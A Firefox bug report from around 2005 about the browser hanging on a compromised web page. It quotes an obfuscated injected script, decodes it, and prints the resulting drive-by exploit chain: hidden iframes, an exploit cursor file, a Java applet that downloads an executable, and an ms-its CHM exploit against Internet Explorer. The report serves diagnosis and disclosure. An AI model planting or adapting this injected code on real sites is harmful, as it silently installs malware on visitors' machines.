Closed Bug 320760 Opened 19 years ago Closed 19 years ago

Browser hangs at 100% CPU following document.write by malicious javascript

Categories

(Firefox :: General, defect)

Product:
Firefox
Component:
General
Platform:
x86
Windows XP
Type:
defect
Priority:
Not set
Severity:
critical

Tracking

()

Status:
RESOLVED DUPLICATE of bug 317334

People

(Reporter: mike.capp, Unassigned)

References

(
URL
)

Details

Attachments

(3 files)

Cut-down version of problem page
649 bytes, text/html
Details
bag.htm as text
214 bytes, text/plain
Details
fillmemadv719.htm as text
4.24 KB, text/plain
Details 
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8) Gecko/20051111 Firefox/1.5
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8) Gecko/20051111 Firefox/1.5

Visiting the URL above caused browser to hang shortly afterwards. No unresponsive-script or other dialogs were shown. Eventually had to kill the app via Task Manager. 

There's a malicious script snippet at the bottom of the page's source doing document.write()s; strongly suspect (but haven't confirmed) that it's writing requests for other resources which cause the lockup on arrival. Googling for (nonsensical) substrings in the script returned lots of hits; this looks like a fairly widely-disseminated exploit.

Similar results when visiting the page in Opera 8.02 and (a freshly patched today) IE6. If this is an exploit it's probably not targetting Moz specifically. I'm marking "security" to be on the safe side, but beyond the dataloss involved in killing the browser I'm not seeing any obvious persistent ill-effects.

Reproducible: Always

Steps to Reproduce:
1. Visit URL above

I've mailed the site owner to let him know of the problem, so it may have been fixed by the time you come to look at it. I'll attach a cut-down version of the page that triggers the same symptoms.

Actual Results:  
Unrecoverable hang.

Expected Results:  
Browser should remain responsive (maybe popup the standard "Warning: unresponsive script" dialog if appropriate).
Cut-down version of problem page, triggering the same symptoms, in case the original has been disinfected by now.

The visible link to http://allsafedestruction.com/Planer_2004.06_crack.shtml was in the original page - I don't know whether it was supposed to be there, or was inserted at the same time as the script, but it looked a little out of place.
the script at the bottom of the page 

k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22xvhu4:1liudph1ux2Brv@|hv%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}

decodes to 

<div style="visibility: hidden; position: absolute; left: 1; top: 1"><iframe src="http://user17.iframe.ru/?os=yes" frameborder=0 vspace=0 hspace=0 width=1 height=1 marginwidth=0 marginheight=0 scrolling=no></iframe></div>

which contains:

<html><body>
<iframe src='http://toolbartraff.biz/dl/adv719.php' WIDTH=0 BORDER=0 HEIGHT=0 st
yle="display:none"></iframe>
</body></html>

which contains:

<html>
<head>
<style>
* {CURSOR: url("http://toolbartraff.biz/dl/adv719/sploit.anr")}
</style>
</head>
<body>
<applet archive="java.jar" code="GetAccess.class" width=1 height=1><param name="Module
Path" value="http://toolbartraff.biz/dl/loaderadv719.exe"></applet>

<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv719.htm></iframe>
<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv719.htm></iframe>
<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv719.htm></iframe>
<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv719.htm></iframe>
<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv719.htm></iframe>
<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv719.htm></iframe>
<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv719.htm></iframe>
<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv719.htm></iframe>
<iframe width=1 height=1 border=0 frameborder=0 src=bag.htm></iframe>

<applet width=1 height=1 ARCHIVE=loaderadv719.jar code=Counter></APPLET>
<SCRIPT LANGUAGE="JavaScript">
obj = "<object data=\"ms-its:mhtml:file";
obj1 = "://C:\\nosuch.mht!http://toolbartraff.biz/dl/adv719/x.chm::/x.htm\" type=\"tex
t/x-scriptlet\"></object>";
document.write(obj+obj1);
</script>
</body>
</html>

definitely an attempt to exploit known IE vulnerabilities. bag.htm is the IE window() exploit. I'll attach bag.htm and fillmemadv719.htm.

Agreed with the analysis: this is the usual grab-bag of IE exploits thrown at the visitor to see what sticks. It's the IE onload=window() exploit that causes the browser to crawl. Firefox isn't vulnerable to the exploit itself, but the huge prompt string tickles a particularly inefficient algorithm.

(I didn't check the java archive for which specific exploit it being used. I expect it is Trojan.ByteVerifier (an IE exploit) since that's what it always is. It could be aimed at a patched Sun JVM bug, though)

*** This bug has been marked as a duplicate of 317334 ***
Group: security
Status: UNCONFIRMED → RESOLVED
Closed: 19 years ago
Resolution: --- → DUPLICATE
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: